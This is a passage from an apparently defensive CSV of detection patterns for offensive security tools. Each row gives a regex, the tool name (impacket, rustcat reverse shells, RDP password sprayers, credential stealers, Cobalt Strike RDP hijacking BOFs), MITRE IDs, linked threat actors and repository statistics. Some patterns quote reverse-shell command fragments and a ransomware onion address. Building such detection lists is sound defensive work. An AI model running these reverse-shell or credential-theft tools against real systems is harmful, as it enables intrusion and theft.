SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","56392" "*rawSHA1_linkedIn_fmt_plug*",".{0,1000}rawSHA1_linkedIn_fmt_plug.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","56393" "*rbcd.py -delegate-from * -delegate-to * -dc-ip * -action write *",".{0,1000}rbcd\.py\s\-delegate\-from\s.{0,1000}\s\-delegate\-to\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-action\swrite\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56394" "*rbcd.py*",".{0,1000}rbcd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","56395" "*RBCD_Petitpotam_VulnerableServers.txt*",".{0,1000}RBCD_Petitpotam_VulnerableServers\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","56396" "*rbsec/dnscan*",".{0,1000}rbsec\/dnscan.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","56397" "*rbvuetuneohce3ouxjlbxtimyyxokb4btncxjbo44fbgxqy7tskinwad.onion*",".{0,1000}rbvuetuneohce3ouxjlbxtimyyxokb4btncxjbo44fbgxqy7tskinwad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56398" "*rc4.py *.bin*",".{0,1000}rc4\.py\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","56399" "*Rc4::new(b""This is nerdy .. im the key :)""*",".{0,1000}Rc4\:\:new\(b\""This\sis\snerdy\s\.\.\sim\sthe\skey\s\:\)\"".{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","56400" "*rcan listen -ib *",".{0,1000}rcan\slisten\s\-ib\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56401" "*rcat c -s bash *",".{0,1000}rcat\sc\s\-s\sbash\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","#linux","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56402" "*rcat connect -s 
bash*",".{0,1000}rcat\sconnect\s\-s\sbash.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","#linux","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56403" "*rcat connect -s sh *",".{0,1000}rcat\sconnect\s\-s\ssh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56404" "*rcat listen 55660*",".{0,1000}rcat\slisten\s55660.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56405" "*rcat listen -ie *",".{0,1000}rcat\slisten\s\-ie\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56406" "*rcat listen -l *",".{0,1000}rcat\slisten\s\-l\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56407" "*rcat-v3.*darwin-aarch64*",".{0,1000}rcat\-v3\..{0,1000}darwin\-aarch64.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port 
listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","#linux","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56408" "*rcat-v3.*-darwin-x86_64*",".{0,1000}rcat\-v3\..{0,1000}\-darwin\-x86_64.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","#linux","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56409" "*rcat-v3.*-linux-x86_64*",".{0,1000}rcat\-v3\..{0,1000}\-linux\-x86_64.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","#linux","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","56410" "*RCE-exploits*",".{0,1000}RCE\-exploits.{0,1000}","offensive_tool_keyword","POC","poc rce - The exploit samples database is a repository for RCE (remote code execution) exploits and Proof-of-Concepts for WINDOWS. 
the samples are uploaded for education purposes for red and blue teams.","T1059.001 - T1210.001 - T1212 - T1055.012","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/smgorelik/Windows-RCE-exploits","1","1","N/A","N/A","N/A","8","746","179","2023-12-11T22:30:33Z","2018-02-13T11:23:40Z","56411" "*RCStep/RedTeam_Tools_n_Stuff*",".{0,1000}RCStep\/RedTeam_Tools_n_Stuff.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","1","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","56430" "*RDE1-main.zip*",".{0,1000}RDE1\-main\.zip.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","56434" "*rdi_net_user.cpp*",".{0,1000}rdi_net_user\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 
- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","56437" "*RDP Recognizer Login Parser*",".{0,1000}RDP\sRecognizer\sLogin\sParser.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","56438" "*rdp_check.py*",".{0,1000}rdp_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","56441" "*rdp_doublepulsar_rce.*",".{0,1000}rdp_doublepulsar_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56442" "*rdp+kerberos-password://*?dc=*proxytype*proxyhost*",".{0,1000}rdp\+kerberos\-password\:\/\/.{0,1000}\?dc\=.{0,1000}proxytype.{0,1000}proxyhost.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","56443" "*rdp+ntlm-password://*@*",".{0,1000}rdp\+ntlm\-password\:\/\/.{0,1000}\@.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","56444" 
"*RDPassSpray.*.log*",".{0,1000}RDPassSpray\..{0,1000}\.log.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","1","#logfile","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","56445" "*RDPassSpray.csv*",".{0,1000}RDPassSpray\.csv.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","56446" "*RDPassSpray.py*",".{0,1000}RDPassSpray\.py.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","56447" "*RDPassSpray-main*",".{0,1000}RDPassSpray\-main.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","56448" "*RDPassSpray-master*",".{0,1000}RDPassSpray\-master.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","56449" 
"*rdpbrute.py*",".{0,1000}rdpbrute\.py.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","N/A","6","561","121","2025-03-28T06:59:25Z","2021-08-18T08:58:14Z","56450" "*RDP-Caching.ps1*",".{0,1000}RDP\-Caching\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","56451" "*RDPCredentialStealer.zip*",".{0,1000}RDPCredentialStealer\.zip.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","56452" "*RDPCredentialStealer-main*",".{0,1000}RDPCredentialStealer\-main.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","56453" 
"*RDPCredsStealerDLL.*",".{0,1000}RDPCredsStealerDLL\..{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","56454" "*RDPCredsStealerDLL.dll*",".{0,1000}RDPCredsStealerDLL\.dll.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","56455" "*rdphijack.*",".{0,1000}rdphijack\..{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","Lateral Movement","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","N/A","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","56456" "*rdphijack.x64*",".{0,1000}rdphijack\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","10","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","56457" "*rdphijack.x64.*",".{0,1000}rdphijack\.x64\..{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","Lateral Movement","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","N/A","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","56458" "*rdphijack.x86*",".{0,1000}rdphijack\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","10","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","56459" "*rdphijack.x86.*",".{0,1000}rdphijack\.x86\..{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","Lateral 
Movement","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","N/A","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","56460" "*RDPHijack-BOF*",".{0,1000}RDPHijack\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","10","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","56461" 
